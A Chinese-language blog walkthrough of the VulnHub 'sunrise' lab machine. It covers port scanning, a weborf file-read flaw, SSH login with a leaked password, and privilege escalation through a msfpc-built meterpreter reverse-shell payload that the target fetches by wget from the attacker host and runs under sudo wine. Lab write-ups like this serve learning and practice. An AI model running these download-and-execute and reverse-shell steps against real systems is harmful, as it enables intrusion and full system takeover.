sunrise-vlunhub渗透测试

前言

靶机:vulnhub-sunrise

靶机IP:192.168.1.118

攻击机IP:192.168.1.117

考点:

​ nikto扫描web服务

​ msf反弹windwos-shell

渗透过程

nmap扫描一下

1
nmap -sS -A -Pn 192.168.1.118

image-20200119224550964

22号端口 ssh连接用的(简单的弱口令 爆破 低版本的绕过或者在后面会有提示的账户密码)
80端口 万恶之源 (敏感目录等一系列的漏洞)
3306端口 mysql数据库 (可以存在sql注入 敏感目录下的wen.config 需要账户和口令)
8080端口 这里是weborf服务 版本0.12.2 等下查一下有没有已知的漏洞

使用dirb扫描了一下,毛都没有

image-20200119225208860

再来看看8080端口,百度了一下weborf 0.12.2版本的漏洞

http://www.guanting.com/security/exploit/information/17760.html

同样也可以使用工具发现他有文件读取漏洞。

nikto扫描一下web服务

1
nikto -url http://192.168.1.118:8080/

image-20200119230326076

使用searchsploit查看该服务的历史漏洞

1
searchsploit weborf

image-20200119230702006

存在漏洞,我们可以读取到/etc/passwd

image-20200119231458604

读到这几个文件,我们试着一个一个去尝试

读sunrise的内容

image-20200119234619566

发现user.txt

image-20200119234655492

weborf的目录中没啥东西,扫描一下

image-20200119235622002

然后看看数据库的操作历史

image-20200119235723958

尝试连接数据库无果,尝试ssh连接(因为有ssh的端口方法,所以就要试试有没有撞库的操作)

1
2
ssh weborf@192.168.1.118
password: iheartrainbows44

image-20200120000734981

然后尝试再连接数据库,可行。

然后查询数据库mysql

image-20200120001159065

改用sunrise

image-20200120004158058

然后切换至root权限,它这个很奇怪,密码没有变,还是sunrise的密码。

image-20200120004420273

这里告诉我们可以使用的命令有wine。

使用wine运行shell吧,我们制造一个木马。

1
msfpc windows 192.168.1.117

制作一个用于反弹shell的木马

然后开启监听

1
python -m SimpleHTTPServer 8000

image-20200120014523495

靶机中下载木马

1
wget http://192.168.1.117:8000/windows-meterpreter-staged-reverse-tcp-443.exe

image-20200120014631645

开启msf

1
2
3
4
use exploit/multi/handler
set lhost 192.168.1.117
set lport 443
exploit -j

image-20200120014934451

靶机运行exe文件

1
sudo wine windows-meterpreter-staged-reverse-tcp-443.exe

image-20200120015300298

反弹shell成功

image-20200120015435829

获得root.txt

image-20200120015540380

总结

参考:玩转Metasploit系列(第七集)

然后在这里有些细节还需要学习一下,关于这个后门模块的学习,wine的理解,连接session的理解,msf的使用,还有对渗透的整体思路有待提高。明天继续做渗透,还有代码审计。

Author: 我是小吴啦
Link: http://yoursite.com/2020/01/12/sunrise-vlunhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.